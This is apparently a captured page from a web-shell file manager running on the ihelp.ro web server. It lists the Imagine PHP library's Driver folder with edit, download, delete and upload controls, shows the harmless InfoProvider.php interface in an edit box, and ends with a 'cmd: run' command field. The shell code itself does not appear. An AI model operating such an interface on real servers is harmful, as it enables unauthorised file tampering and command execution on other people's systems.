/
var
/
www
/
vhosts
/
ihelp.ro
/
httpdocs
/
vendor
/
imagine
/
imagine
/
src
/
Driver
/
/var/www/vhosts/ihelp.ro/httpdocs/vendor/imagine/imagine/src/Driver
mkdir
upload
Name
Size
Mode
Actions
AbstractInfo.php
4300
0644
edit
dl
rm
Info.php
7277
0644
edit
dl
rm
InfoProvider.php
505
0644
edit
dl
rm
Edit:
/var/www/vhosts/ihelp.ro/httpdocs/vendor/imagine/imagine/src/Driver/InfoProvider.php
(505B)
<?php namespace Imagine\Driver; /** * Interface implemented by classes that provide info about a graphics driver. * * @since 1.3.0 */ interface InfoProvider { /** * Get the info about this driver. * * @param bool $required when the driver is not available: if FALSE the function returns NULL, if TRUE the driver throws a \Imagine\Exception\NotSupportedException * * @return \Imagine\Driver\Info|null */ public static function getDriverInfo($required = true); }
Save
cmd:
run